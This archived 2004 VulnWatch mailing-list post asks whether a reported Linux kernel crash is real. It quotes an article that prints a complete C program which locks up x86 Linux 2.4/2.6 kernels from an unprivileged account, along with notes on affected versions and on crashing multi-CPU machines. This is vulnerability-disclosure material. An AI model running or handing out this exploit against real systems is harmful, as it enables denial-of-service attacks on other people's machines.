[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[VulnWatch] Kernel Exploit?

To: <vulnwatch@xxxxxxxxxxxxx>
Subject: [VulnWatch] Kernel Exploit?
From: JM <jerome@xxxxxxxxx>
Date: Tue, 15 Jun 2004 12:22:15 +0800

im wondering if this is true... tried it in one of my LAN boxes but it seems 
it didnt work...



http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc1

New Kernel Crash-Exploit discovered


A bug lets a simple C program crash the kernel, effectively locking the 
whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.

The Evil Code

Running this simple C program crashes the Linux kernel.

crash.c.txt

   #include <sys/time.h>
   #include <signal.h>
   #include <unistd.h>

   static void Handler(int ignore)
   {
    char fpubuf[108];
    __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
   }

   int main(int argc, char *argv[])
   {
    struct itimerval spec;
    signal(SIGALRM, Handler);
    spec.it_interval.tv_sec=0;
    spec.it_interval.tv_usec=100;
    spec.it_value.tv_sec=0;
    spec.it_value.tv_usec=100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while(1)
     write(1, ".", 1);

    return 0;
   }



This bug is confirmed to be present when the code is compiled with GCC 
version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel 
versions 2.4.2x and 2.6.x on x86 and amd64 systems.

The threat

Using this exploit to crash Linux systems requires the (ab)user to have 
shell access or other means of uploading and running the program (like 
cgi-bin and FTP access). The program works on any normal user account, 
root access is not required. This exploit has been reported used to take 
down several "lame free-shell providers" servers (running code you know 
will damage a system intentionally and hacking in general is illegal in 
most parts of the world and strongly discouraged).

This code only works on x86 Linux machines. This code does not compile 
(makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). 
This doesn't affect NetBSD Stable.

SMP systems can be compromised, but a separate instance of the program 
is required for each CPU before the system halts. Each instance of the 
program code will lock one CPU and this process can not be killed. If 
you have two CPUs the second instance of the program kills the entire 
machine.

Check your own system yourself if you are wondering if this affects you. 
Better safe than sorry. Assume it will crash, sync (even unmount) your 
file systems before testing. If your system is a production server with 
1000 on line users then do not test this code on that box.

Prev by Date: [VulnWatch] IRIX syssgi system call vulnerability and other security fixes
Next by Date: [VulnWatch] ZH2004-13SA (security advisory): Sql Injection in Help Desp Pro 2.0
Previous by thread: [VulnWatch] IRIX syssgi system call vulnerability and other security fixes
Next by thread: [VulnWatch] ZH2004-13SA (security advisory): Sql Injection in Help Desp Pro 2.0
Index(es):
- Date
- Thread